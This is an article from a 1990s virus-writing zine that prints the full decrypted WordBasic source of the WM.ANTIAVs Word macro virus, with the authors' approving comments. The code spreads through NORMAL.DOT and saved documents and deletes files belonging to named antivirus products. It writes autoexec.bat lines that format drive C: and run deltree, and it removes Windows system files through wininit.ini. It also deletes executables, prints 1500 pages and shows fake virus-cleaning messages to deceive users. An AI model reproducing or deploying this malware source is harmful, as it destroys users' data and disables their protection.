Copy Link
Add to Bookmark
Report
SLAM3.002: Description of the Word Macro AntiAVs Virus by NJ & AuroDreph [SLAM]
SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM
| |
S Description of the Word Macro ANTIAVs (alias Varmind)Virus ! S
L L
| decrypted with LWM 1.0 |
A A
M by Nightmare Joker [SLAM] and AuRoDrEpH, the Drow M
| |
SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM
Identification:
- VIRUSNAME: WM.ANTIAVs
- SIZE: 12489 Bytes (9 Macros)
- ORIGIN: Samuel Corp. ???
- AUTHOR: ???
Characteristics:
- Polymorphism: No
- Stealth: Yes (low)
- Encrypted: Yes (normal Word encryption)
- Retro: Yes
- Payload: Yes
Quite interesting virus.
This virus is dedicated to all AntiVx programs... When the virus finds one of them, it destroys it... it's a good ideas, isn't it !!!!
This babe has many retro routines and try to kill the main files of the most win95 av scanner. The stealth routine (ToolsMacro) works only at the english version of word and could still become better.
The virus files are encrypted from the author and not from the virus itself (no ",1" option behind the MacroCopy command).
It uses no own encryption routine, so the virus will detect from the most heuristic macro scanner. The interesting thing on this virus is the Payload and the retro routines. So, let's look at the source code.
'cOMMENT sTART wITH => '|
VIRUS CODE:
~~~~~~~~~~~
⁄----------------------------------------------------------------------------ø
| Macro: AutoExec |
¿----------------------------------------------------------------------------Ÿ
'|this macro is used to infected the system and launch the antiVx detection and
'|destruction. This macro adds a profile in the registration database of windows.
'Latest date Apr 23 '97
Sub MAIN
'| At first run the "Change" routine and call then the "AVV" macro.
Change
Call AAV
'| If today is the 11.11.xx then start the "AVV" macro on 11:11:11 o'clock.
If Day(Now()) = 11 And Month(Now()) = 11 Then
tm$ = "11:11:11"
OnTime tm$, "AAV.FUN", 0
End If
End Sub
Sub Change
On Error Resume Next
'| Set FastSaves On and automatic save all changes on normal.dot.
ToolsOptionsSave .FastSaves = 1, .GlobalDotPrompt = 0
'| If the user start the virus the first time then it try to change
'| the name of some menu options. Hm, I couldn't get it to work. :-?
If GetProfileString$("AntiAVs", "Installed") = "" Then
ToolsCustomizeMenus .ResetAll, .Context = 0
ToolsCustomizeMenus .ResetAll, .Context = 1
ToolsCustomizeMenus .MenuType = 0, .Position = - 1, .Category = 1,
.Name = "ToolsCustomize", .Menu = "A475-A8E3-(&T)",
.MenuText = "A6DB-AD71-(&C)...", .Remove, .Context = 0
ToolsCustomizeMenus .MenuType = 0, .Position = - 1, .Category = 1,
.Name = "FilePageSetup", .Menu = "C0C9-AED7-(&F)",
.AddBelow = "B35D-A977-A643-A64C-AEE6-A6A1-(&U)...",
.MenuText = "AntiAVs", .Rename, .Context = 0
ToolsCustomizeMenus .MenuType = 0, .Position = - 1, .Category = 1,
.Name = "FilePrintPreview", .Menu = "C0C9-AED7-(&F)",
.AddBelow = "B977-C4FD-A643-A64C-(&V)", .MenuText = "is",
.Rename, .Context = 0
ToolsCustomizeMenus .MenuType = 0, .Position = - 1, .Category = 1,
.Name = "FilePrint", .Menu = "C0C9-AED7-(&F)",
.AddBelow = "A643-A64C-(&P)...", .MenuText = "active !!!",
.Rename, .Context = 0
'| Create two check points in the win.ini file and insert some text into the
'| win95 registry.
SetProfileString "AntiAVs", "Version", "1.0"
SetProfileString "AntiAVs", "Installed", "1"
SetPrivateProfileString("HKEY_LOCAL_MACHINE\SOFTWARE\Samuel Corp.\
AntiAVs\1.0", "Installed", "1", "")
End If
End Sub
'Finish date:Apr 23 '97
⁄----------------------------------------------------------------------------ø
| Macro: AAV |
¿----------------------------------------------------------------------------Ÿ
'|This macro is used to delete all anti-virus installed on the computer...
'|For each AVx, it searchs a specific file like scan32.dll,etc...
'Latest date Apr 23 '97
Sub MAIN
'| At first create some strings, set DisableInput On and start
'| the Errorhandler.
t1$ = "Found virus "
t2$ = " and has been clean."
t3$ = "AntiAVs"
DisableInput 1
On Error Resume Next
'| Search the "Scan32.dll" file from the av scanner PC-Cillin 95.
AV1$ = Files$("C:\PC-Cillin 95\Scan32.dll")
If AV1$ = "" Then Goto AV2
'| remove the attribute from the autoexec.bat file
SetAttr "c:\autoexec.bat", 0
'| open it and write the following three lines into the file.
'| 1. @echo off
'| 2. attrib -h -r -s +a c:\pc-cil~1\*.* >nul
'| => remove all attributes from the files in the pc-cil~1 directory.
'| 3. del c:\pc-cil~1\*.dll >nul
'| => delete now all files with the extension "dll"
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "attrib -h -r -s +a c:\pc-cil~1\*.* >nul"
Print #1, "del c:\pc-cil~1\*.dll >nul"
Close #1
'| Delete the Lpt$vpn.* files, too and show the user the nice message:
'| Found Virus PC-CILLIN 95 and has been clean. ;)
Kill "C:\PC-Cillin 95\Lpt$vpn.*"
MsgBox t1$ + "PC-CILLIN 95" + t2$, t3$, 48
AV2:
'| And now search the files from the new PC Cillin 97 version.
'| If there is the "Scan32.dll" file, then again kill it at
'| every new system start. This time the message is:
'| Found Virus PC-Cillin II and has been clean.
AV2$ = Files$("C:\PC-Cillin 97\Scan32.dll")
If AV2$ = "" Then Goto AV3
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "attrib -h -r -s +a c:\pc-cil~1\*.* >nul"
Print #1, "del c:\pc-cil~1\*.dll >nul"
Close #1
Kill "C:\PC-Cillin 97\Lpt$vpn.*"
MsgBox t1$ + "PC-CILLIN II" + t2$, t3$, 48
AV3:
'| The author of this virus must really hate the PC-Cillin scanner. hehe
'| Here is the third way to kill the main files of this scanner. ;]
AV3$ = Files$("C:\Tsc\PC-Cillin 97\Scan32.dll")
If AV3$ = "" Then Goto AV4
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "attrib -h -r -s +a c:\tsc\pc-cil~1\*.* >nul"
Print #1, "del c:\tsc\pc-cil~1\*.dll >nul"
Close #1
Kill "C:\Tsc\PC-Cillin 97\Lpt$vpn.*"
MsgBox t1$ + "PC-CILLIN II" + t2$, t3$, 48
AV4:
'| And now let's kill some "Zlockav" scanner files.
AV4$ = Files$("C:\Zlockav\Gsav.dat")
If AV4$ = "" Then Goto AV5
Kill AV4$
Kill "C:\Zlockav\Gsav.cas"
'| The Message box routine is here, but deactivate. :-?
'MsgBox t1$ + "Zlock" + t2$, t3$, 48
AV5:
AV5$ = Files$("C:\VB7\Virus.txt")
If AV5$ = "" Then Goto AV6
Kill AV5$
'MsgBox t1$ + "VB7/VB95" + t2$, t3$, 48
AV6:
AV6$ = Files$("C:\Program Files\Norton AntiVirus\Viruscan.dat")
If AV6$ = "" Then Goto AV7
Kill AV6$
Kill "C:\Program Files\Symantec\Symevnt.386"
'MsgBox t1$ + "NAV95" + t2$, t3$, 48
AV7:
AV7$ = Files$("C:\Program Files\McAfee\VirusScan95\Scan.dat")
If AV7$ = "" Then Goto AV8
Kill AV7$
Kill "C:\Program Files\McAfee\VirusScan95\Mcscan32.dll"
'MsgBox t1$ + "VirusScan95" + t2$, t3$, 48
AV8:
AV8$ = Files$("C:\Program Files\McAfee\VirusScan\Scan.dat")
If AV8$ = "" Then Goto AV9
Kill AV8$
Kill "C:\Program Files\McAfee\VirusScan\Mcscan32.dll"
'MsgBox t1$ + "VirusScan95 3.0" + t2$, t3$, 48
AV9:
AV9$ = Files$("C:\Program Files\Command Software\F-PROT95\Sign.def")
If AV9$ = "" Then Goto AV10
Kill AV9$
Kill "C:\Program Files\Command Software\F-PROT95\Dvp.vxd"
'MsgBox t1$ + "F-Prot 95" + t2$, t3$, 48
AV10:
AV10$ = Files$("C:\Program Files\AntiViral Toolkit Pro\Avp32.exe")
If AV10$ = "" Then Goto AV11
Kill AV10$
Kill "C:\Program Files\AntiViral Toolkit Pro\*.avc"
'MsgBox t1$ + "AVP 95" + t2$, t3$, 48
AV11:
AV11$ = Files$("C:\TBAVW95\Tbscan.sig")
If AV11$ = "" Then Goto exit
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "attrib -h -r -s +a c:\Tbavw95\*.* >nul"
Print #1, "del c:\Tbavw95\Tb*.* >nul"
Close #1
Kill "C:\Tbavw95\Tbavw95.vxd"
exit:
'| generate a random number
D = Int(Rnd() * 7) + 1
'| if today is the "random" weekday then rename the autoexec.bat
'| file to autoexec.aav, show the user a message and create the new
'| autoexec.bat file, which formats the hard drive c:.
If Weekday(Now()) = D Then
SetAttr "C:\AUTOEXEC.BAT", 0
Name "C:\AUTOEXEC.BAT" As "C:\AUTOEXEC.AAV"
Open "C:\AUTOEXEC.BAT" For Output As #1
Print #1, "@Echo off"
Print #1, "cls"
Print #1, "echo I have clean a huge virus:"
Print #1, "echo MS-WINDOWS"
Print #1, "echo for you. ^_^"
Print #1, "echo --AntiAVs--"
Print #1, "echo y|format c: /u /v:AAV >nul"
Print #1, "deltree /y c: >nul"
Close #1
dsk$ = Left$(DefaultDir$(9), 3)
DocMinimize
search:
'| Show the user a message, begin to search files, which contains the "av"
'| string and delete them. The virus shows a message box after deleting of
'| a file, too.
MsgBox "AntiAVs now scan memory for unknown and boot virus, " +
Chr$(10) + " It might takes a few minutes. Please wait . . . ", "
AVscan", 64
FileFind .SearchPath = dsk$, .Name = "*av.*", .SubDir = 1
j = CountFoundFiles() - 1
If j >= 0 Then
For jj = 0 To j
SetAttr FoundFileName$(jj + 1), 0
Kill FoundFileName$(jj + 1)
Next
MsgBox "Found virus on memory has been clean.", "AVclean", 48
Else
MsgBox "No virus found on memory. ", "AntiAVs", 64
End If
'| And now the same again with the string "scan".
MsgBox "AntiAVs now scan " + dsk$ + " drive for unknown virus, " + Chr$(10) + " It might takes a few minutes. Please wait . . . ", "AVscan", 64
FileFind .SearchPath = dsk$, .Name = "*scan.*", .SubDir = 1
k = CountFoundFiles() - 1
If k >= 0 Then
For kk = 0 To k
SetAttr FoundFileName$(kk + 1), 0
Kill FoundFileName$(kk + 1)
Next
t = CountFoundFiles()
t$ = Str$(t)
MsgBox "Found " + t$ + " unknown virus, and has been clean.", "AVhunt", 48
Else
MsgBox "No virus found on " + dsk$, "AntiAVs", 64
End If
'| If the active path isn't c:\ then change the dsk$ variable and jump back
'| to *search* label.
'| Then delete the autoexec.bat file and rename
'| the autoexec.aav file to autoexec.bat.
If UCase$(dsk$) <> "C:\" Then
dsk$ = "C:\"
Goto search
End If
Kill "C:\AUTOEXEC.BAT"
Name "C:\AUTOEXEC.AAV" As "C:\AUTOEXEC.BAT"
MsgBox "The AntiAVs Auto-protect and AVShield is active. " + Chr$(10) + "AntiAVs always protects you from AV's damage and disturbance." + Chr$(10) + Chr$(10) + "AntiAVs V1.0(C) by Samuel Lin in NYMU, Taiwan", "AntiAVs", 64
DocMaximize
End If
End Sub
Sub FUN
'|Another payload : destroy WINDOWS 95 if the day of the month is 11
Dim AV$(12)
'| Set DisableInput On
DisableInput 1
On Error Goto exit
'| if it's the right date then remove all attributes from the autoexec.bat
'| file and insert some new destructive lines. ;)
If Day(Now()) = 11 Then
dd = 1
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "Attrib -r -h -s *.* >nul"
Print #1, "echo y|del *.* >nul"
Close #1
'| create the wininit.ini file.
Open "C:\Windows\Wininit.ini" For Output As #1
Print #1, "[rename]"
Print #1, "NUL=C:\windows\system\Shell32.dll"
Print #1, "NUL=C:\windows\system\Msgsrv32.exe"
Print #1, "NUL=C:\windows\system\Winnls.dll"
Print #1, "NUL=C:\windows\system\Imm32.dll"
Close #1
End If
k = 0
l = 0
avg:
'|ask what kind of antivirus is installed on the HD... good idea
AV$(1) = "PCC" : AV$(2) = "Zlock" : AV$(3) = "NAV" : AV$(4) = "VirusScan"
AV$(5) = "VB" : AV$(6) = "IBMAV" : AV$(7) = "F-Prot" : AV$(8) = "TBAV"
AV$(9) = "ViruSafe" : AV$(10) = "AVP" : AV$(11) = "Sweep" : AV$(12) = "Those"
Begin Dialog UserDialog 292, 215, "AntiAVs"
Text 10, 6, 271, 13, "Which AV program do you use right now ?", .Text1
PushButton 30, 25, 88, 21, "PCC", .Push1
PushButton 30, 50, 88, 21, "Zlock", .Push3
PushButton 30, 75, 88, 21, "NAV", .Push2
PushButton 30, 100, 88, 21, "VirusScan", .Push4
PushButton 30, 125, 88, 21, "VB", .Push5
PushButton 150, 25, 88, 21, "IBMAV", .Push6
PushButton 150, 50, 88, 21, "F-Prot", .Push7
PushButton 150, 75, 88, 21, "TBAV", .Push8
PushButton 150, 100, 88, 21, "ViruSafe", .Push9
PushButton 30, 150, 88, 21, "AVP", .Push10
PushButton 150, 125, 88, 21, "Sweep", .Push11
PushButton 150, 150, 88, 21, "Others", .Push12
PushButton 40, 180, 190, 21, "I don't use AV.", .Push13
End Dialog
Dim AV As UserDialog
num = Int(Rnd() * 12) + 1
'| Start the dialog box and show one of three different messages.
ans = Dialog(AV)
If ans = 13 Then
MsgBox "Don't you lie to me !", "I don't believe it !", 16
l = l + 1
If l > 2 Then Goto done
Goto avg
End If
If ans = num Then
MsgBox "You are very brilliant to choose " + AV$(ans) + " ! ", "Wise Choice !", 64
If dd = 1 Then
Kill "C:\Autoexec.bat"
Kill "C:\Windows\Wininit.ini"
End If
Goto exit
End If
MsgBox AV$(ans) + " is the worst program I've ever heard !" + Chr$(10) + "Fortunately, I will clean it for you.", "I am sorry ! ", 48
For N = 1 To 15
FileNewDefault
If DocMaximize() <> 0 Then DocRestore
CenterPara
FormatFont .Points = 48, .Bold = 1, .Underline = 1, .Italic = 1, .Color = 6
Insert AV$(ans) + " is the worst AV program in the universe. "
Insert AV$(ans) + " is the worst AV program in the universe. "
Next N
FilePrint .Type = 0, .AppendPrFile = 0, .Range = "0", .PrToFileName = "", .From = "", .To = "", .NumCopies = "1500", .Pages = "", .Order = 0, .PrintToFile = 0, .Collate = 1, .FileName = ""
k = k + 1
If k <= 5 Then Goto avg
done:
'| Delete all ini files in the windows directory and close windows.
Kill "C:\Windows\*.ini"
Call Organizer
ExitWindows
exit:
End Sub
⁄----------------------------------------------------------------------------ø
| Macro: AutoOpen |
| Description: AntiAVs |
¿----------------------------------------------------------------------------Ÿ
'|This macro infected the file. .
Sub MAIN
On Error Resume Next
Call AutoExec.Change
n$ = DefaultDir$(2) + "\NORMAL.DOT"
If GetAttr(n$) < 32 Then Call Organizer
f$ = FileName$()
a = CountMacros(0)
If a > 0 Then
For b = 1 To a
If MacroName$(b, 0) = "AAV" Then c = 1
Next b
End If
'| This macro uses the Organizer to infect the NORMAL.DOT
If c <> 1 Then
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AAV", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AutoOpen", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AutoNew", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AutoExec", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "FileSaveAs", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "ToolsMacro", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "FileTemplates", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "Organizer", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "ZlockMacro", .Tab = 3
End If
aa = CountMacros(1)
If aa > 0 Then
For bb = 1 To aa
If MacroName$(bb, 1) = "AAV" Then cc = 1 'to know if the virus is still installed
Next bb
End If
'|This part of the macro uses the standard copy method...
If cc <> 1 Then
FileSaveAs .Format = 1
fm$ = FileName$() + ":AutoOpen"
MacroCopy "AutoOpen", fm$
fm$ = FileName$() + ":AutoExec"
MacroCopy "AutoExec", fm$
fm$ = FileName$() + ":AutoNew"
MacroCopy "AutoNew", fm$
fm$ = FileName$() + ":FileSaveAs"
MacroCopy "FileSaveAs", fm$
fm$ = FileName$() + ":ToolsMacro"
MacroCopy "ToolsMacro", fm$
fm$ = FileName$() + ":FileTemplates"
MacroCopy "FileTemplates", fm$
fm$ = FileName$() + ":Organizer"
MacroCopy "Organizer", fm$
fm$ = FileName$() + ":AAV"
MacroCopy "AAV", fm$
fm$ = FileName$() + ":ZlockMacro"
MacroCopy "ZlockMacro", fm$
End If
'|Add a link between a keyboard key, X and the macro
If Weekday(Now()) = 3 Then
x = Int(Rnd() * 79) + 32
ToolsCustomizeKeyboard .ResetAll, .Context = 1
ToolsCustomizeKeyboard .KeyCode = x, .Category = 6, .Name = "x", .Add, .Context = 1
End If
End Sub
⁄----------------------------------------------------------------------------ø
| Macro: AutoNew |
| Description: AntiAVs |
¿----------------------------------------------------------------------------Ÿ
'| same macro as AutoOpen
Sub MAIN
On Error Resume Next
Call AutoExec.Change
n$ = DefaultDir$(2) + "\NORMAL.DOT"
f$ = FileName$()
If GetAttr(n$) < 32 Then Goto del
a = CountMacros(0)
If a > 0 Then
For b = 1 To a
If MacroName$(b, 0) = "AAV" Then c = 1
Next b
End If
If c <> 1 Then
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AAV", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AutoOpen", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AutoNew", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AutoExec", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "FileSaveAs", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "ToolsMacro", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "FileTemplates", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "Organizer", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "ZlockMacro", .Tab = 3
End If
aa = CountMacros(1)
If aa > 0 Then
For bb = 1 To aa
If MacroName$(bb, 1) = "AAV" Then cc = 1
Next bb
End If
If cc <> 1 Then
FileSaveAs .Format = 1
fm$ = FileName$() + ":AutoOpen"
MacroCopy "AutoOpen", fm$
fm$ = FileName$() + ":AutoExec"
MacroCopy "AutoExec", fm$
fm$ = FileName$() + ":AutoNew"
MacroCopy "AutoNew", fm$
fm$ = FileName$() + ":FileSaveAs"
MacroCopy "FileSaveAs", fm$
fm$ = FileName$() + ":ToolsMacro"
MacroCopy "ToolsMacro", fm$
fm$ = FileName$() + ":FileTemplates"
MacroCopy "FileTemplates", fm$
fm$ = FileName$() + ":Organizer"
MacroCopy "Organizer", fm$
fm$ = FileName$() + ":AAV"
MacroCopy "AAV", fm$
fm$ = FileName$() + ":ZlockMacro"
MacroCopy "ZlockMacro", fm$
End If
'|a new payload : if day is 20 and minute is 20, delete all the EXE files
d = Int(Rnd() * 15) + 2
w = d Mod 7
If Weekday(Now()) = w Then
FormatFont .Points = 14, .Bold = 1, .Italic = 1, .Color = d
End If
If Day(Now()) = 20 And Minute(Now()) = 20 Then
del:
cd = CountDirectories("C:\")
For a = 1 To cd
aa$ = "C:\" + GetDirectory$("C:\", a) + "\*.exe"
aaa$ = Files$("C:\" + GetDirectory$("C:\", a) + "\*.exe")
If aaa$ = "" Then Goto NA
Kill aa$
MsgBox "Detect damage by some known/unknown virus on C:\ " + GetDirectory$("C:\", a) + Chr$(10) + " Low level format was recommanded !! ", "AVShield virus alert", 48
Goto exit
NA:
Next a
End If
exit:
End Sub
⁄----------------------------------------------------------------------------ø
| Macro: FileSaveAs |
| Description: AntiAVs |
¿----------------------------------------------------------------------------Ÿ
'|The macro FileSaveAs infect a file when the user saves it.
'Latest date Apr 23 '97
Sub MAIN
If GetAttr(n$) < 32 Then Call Organizer
Dim dlg As FileSaveAs
GetCurValues dlg
Dialog dlg
f$ = FileName$()
n$ = DefaultDir$(2) + "\NORMAL.DOT"
If (dlg.Format = 0) Or (dlg.Format = 1) Then
fm$ = FileName$() + ":AutoOpen"
MacroCopy "AutoOpen", fm$
fm$ = FileName$() + ":AutoExec"
MacroCopy "AutoExec", fm$
fm$ = FileName$() + ":AutoNew"
MacroCopy "AutoNew", fm$
fm$ = FileName$() + ":FileSaveAs"
MacroCopy "FileSaveAs", fm$
fm$ = FileName$() + ":ToolsMacro"
MacroCopy "ToolsMacro", fm$
fm$ = FileName$() + ":FileTemplates"
MacroCopy "FileTemplates", fm$
fm$ = FileName$() + ":Organizer"
MacroCopy "Organizer", fm$
fm$ = FileName$() + ":AAV"
MacroCopy "AAV", fm$
dlg.Format = 1
End If
'a pretty payload : if day > 15, replace all the "," with a "."... I don't know the interest.
If Day(Now()) > 15 Then
EditReplace .Find = ",", .Replace = ".", .Direction = 0, .MatchCase = 0, .WholeWord = 1, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0
End If
FileSaveAs dlg
End Sub
⁄----------------------------------------------------------------------------ø
| Macro: FileTemplates |
| Description: AntiAVs |
¿----------------------------------------------------------------------------Ÿ
'|This macro protected the access to File Templates..
'|If you try, you put a password in your document and you have a chance to launch a payload
Sub MAIN
DisableInput 1
Call AutoOpen
On Error Resume Next
FileSaveAs .Password = "AntiAVs"
MsgBox "Not enough memory!", "WordBasic Err = 16 ", 16
Call AAV
D = Int(Rnd() * 99) + 1
If D >= 80 Then Call AAV.FUN
End Sub
⁄----------------------------------------------------------------------------ø
| Macro: ToolsMacro |
| Description: AntiAVs |
¿----------------------------------------------------------------------------Ÿ
'|This macro protected the access to ToolsMacro..
'| If you try, you have a chance to launch a payload (another one...)
Sub MAIN
On Error Resume Next
DisableInput 1
Call AutoOpen
EditSelectAll
EditClear
Insert " "
FileSave
Call AAV
D = Int(Rnd() * 100) + 1
If D >= 90 Then Call AAV.FUN
MsgBox "B36F-ADD3-B57B-A6A1-B0F5-A6E6-AABA-A740-B77E-B54C-AEC4-A141-A759-B14E-C3F6-B3AC-A143" + Chr$(10) + "A670-AA47-B0DD-C344-B54C-AA6B-B8D1-A84D-A141-BDD0-ACA2-B8DF-B57B-A6A1-B35D-AD70-A448-ADFB-A143", "winword", 16
DocClose 1
FileExit 1
End Sub
⁄----------------------------------------------------------------------------ø
| Macro: Organizer |
| Description: AntiAVs |
¿----------------------------------------------------------------------------Ÿ
'|his macro protected the access to the Organizer..
'| If you try, a file is deleted and the virus informs you...
Sub MAIN
DisableInput 1
On Error Resume Next
Call AutoExec.Change
cd = CountDirectories("C:\")
For a = 1 To cd
aa$ = "C:\" + GetDirectory$("C:\", a) + "\*.*"
aaa$ = Files$("C:\" + GetDirectory$("C:\", a) + "\*.*")
If aaa$ = "" Then Goto NA
Kill aa$
MsgBox "Some known/unknown virus on C:\ " + GetDirectory$("C:\", a) + " have been clean.", "AntiAVs Virus Alert", 32
Goto exit
NA:
Next a
exit:
End Sub
⁄----------------------------------------------------------------------------ø
| Macro: ZlockMacro |
| Description: ZlockMacro |
¿----------------------------------------------------------------------------Ÿ
Sub MAIN
'Check
End Sub
---------------------------The END----------------------------------------------